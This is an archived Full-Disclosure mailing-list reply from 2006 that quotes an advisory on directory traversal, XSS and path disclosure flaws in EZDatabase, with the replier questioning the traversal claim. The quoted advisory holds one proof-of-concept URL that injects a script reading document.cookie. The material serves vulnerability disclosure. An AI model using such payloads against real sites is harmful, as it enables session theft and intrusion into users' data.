Re: [Full-disclosure] EZDatabase Directory Transversal, XSS and Path Disclosure Vulnerability
- From: Siegfried <siegfri3d@xxxxxxxxx>
- Date: Sun, 15 Jan 2006 19:33:42 +0100
> The $p variable is not properly sanitized in index.php. Note the code in
> index.php tacks on a ".php" to any file requested.
the fact that it adds ".php" to it isn't a problem in itself, if it
filters directory traversal sequences. can you confirm it doesn't?
maybe posting a piece of code.. the product isn't free
2006/1/15, Josh Zlatin <josh_at_ramat.cc> :
> Synopsis: EZDatabase directory transversal, XSS and path disclosure
> vulnerability
>
> Product: EZDatabase
> http://www.ezdatabase.org
>
> Version: Confirmed on EZDatabase < 2.1.2
>
> Author: Josh Zlatin-Amishav
>
> Date: January 15, 2006
>
> Background:
> Written in PHP and MySQL, ezDatabase is the foundation for your online
> databases. It is a powerful web based application that allows even
> non-technical users to create online databases for their website.
> ezDatabase will do the hard work while you concentrate on building the
> databases you want.
>
> Issue:
> The $p variable is not properly sanitized in index.php. Note the code in
> index.php tacks on a ".php" to any file requested.
>
> PoC:
> http://localhost/index.php?db_id=1&cat_id=1&display=30&p=%3Cscript%3Ealert(document.cookie)%3C/script%3E&rowstart=90
>
> References:
> http://www.ezdatabase.org
> http://zur.homelinux.com/Advisories/ezdatabase_dir_trans.txt
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: [Full-disclosure] DMA[2006-0115a] - 'AmbiCom Bluetooth Object Push Overflow'
- Next by Date: [Full-disclosure] Announcement: The Web Application Firewall Evaluation Criteria v1 Released
- Previous by thread: [Full-disclosure] EZDatabase Directory Transversal, XSS and Path Disclosure Vulnerability
- Next by thread: [Full-disclosure] Re: [CIRT.DK] Apple QuickTime 7.0.3 and earlier - JPG/PICT Buffer Overflow
- Index(es):
Relevant Pages
|